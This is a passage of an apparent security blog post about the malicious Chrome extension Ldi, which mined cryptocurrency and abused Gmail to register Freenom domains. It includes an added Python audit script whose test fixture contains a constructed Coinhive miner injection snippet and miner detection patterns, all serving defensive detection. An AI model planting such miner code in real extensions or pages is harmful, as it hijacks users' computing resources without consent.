With Chrome being the most widely used web browser, attackers are developing more advanced and malicious extensions for it every day. Whether it's impersonating popular extensions to deliver ads, hijacking search queries, or injecting the Coinhive browser miner, it is easy to see that malicious extensions are on the rise.
The extension we are going to look at today, called Ldi, takes malicious behavior to the next level: it not only loads the Coinhive browser miner into a victim's browser and uses up all of the CPU, but it also uses that victim's Gmail account to register free domains for the attackers through Freenom.
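For a defender triaging an unpacked extension, the combination described above (access to Gmail and Freenom pages plus bundled Coinhive miner code) is something a small audit script can flag. The following is an added example, not code from this post or from Ldi; the manifest and scripts are constructed samples, the Coinhive library URL and CoinHive.Anonymous API name are the public ones, and the site key is a placeholder.

```python
import json
import re
# Constructed sample of an unpacked extension, modelled on the behaviour the post
# describes (Coinhive miner plus Gmail/Freenom access). This is NOT Ldi's real code.
SAMPLE_MANIFEST = json.dumps({
    "manifest_version": 2, "name": "sample", "version": "1.0",
    "permissions": ["tabs", "<all_urls>"],
    "content_scripts": [{"matches": ["https://mail.google.com/*",
                                     "https://my.freenom.com/*"],
                         "js": ["cs.js"]}],
})
SAMPLE_SCRIPTS = {
    "bg.js": "var s=document.createElement('script');"
             "s.src='https://coinhive.com/lib/coinhive.min.js';",
    "cs.js": "var m=new CoinHive.Anonymous('PLACEHOLDER_SITE_KEY'); m.start();",
}

# Hosts that a "homepage compatibility checker" has no business reaching.
SENSITIVE_HOSTS = ("mail.google.com", "freenom.com")
# Match patterns that grant access to every host, so implicitly to the ones above.
ALL_HOSTS = ("<all_urls>", "*://*/*", "http://*/*", "https://*/*")
# Public markers of the Coinhive miner: library URL and its JS API entry point.
MINER_PATTERNS = (r"coinhive\.com/lib", r"CoinHive\.Anonymous", r"coinhive\.min\.js")

def reachable_sensitive_hosts(manifest: dict) -> list:
    """Sensitive hosts the manifest lets the extension touch, via explicit
    content-script matches, host permissions, or a catch-all pattern."""
    patterns = list(manifest.get("permissions", []))
    for cs in manifest.get("content_scripts", []):
        patterns.extend(cs.get("matches", []))
    if any(p in ALL_HOSTS for p in patterns):
        return sorted(SENSITIVE_HOSTS)
    return sorted({h for h in SENSITIVE_HOSTS for p in patterns if h in p})

def audit_extension(manifest_json: str, scripts: dict) -> dict:
    """Flag the combination the post describes: access to Gmail/Freenom pages
    plus bundled Coinhive miner code in any of the extension's scripts."""
    hosts = reachable_sensitive_hosts(json.loads(manifest_json))
    miner_hits = {}
    for name, body in scripts.items():
        hits = [p for p in MINER_PATTERNS if re.search(p, body)]
        if hits:
            miner_hits[name] = hits
    return {"sensitive_hosts": hosts, "miner_hits": miner_hits,
            "suspicious": bool(hosts) and bool(miner_hits)}

if __name__ == "__main__":
    print(json.dumps(audit_extension(SAMPLE_MANIFEST, SAMPLE_SCRIPTS), indent=2))
```

Note that a broad `<all_urls>` grant reaches Gmail without naming it, which is why the host check treats catch-all patterns as covering every sensitive host.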
Promoted through scammy web sites
This extension was promoted through sites that displayed JavaScript alerts continuously prompting you to install it. Although the site is no longer online, when a victim tried to close these alerts, the page would automatically open the Chrome Web Store page for the extension. That Web Store page had little to no information, and the description read "Wondering if your homepage is compatible with Mac? Check it with Ldi." The extension has since been removed from the Chrome Web Store.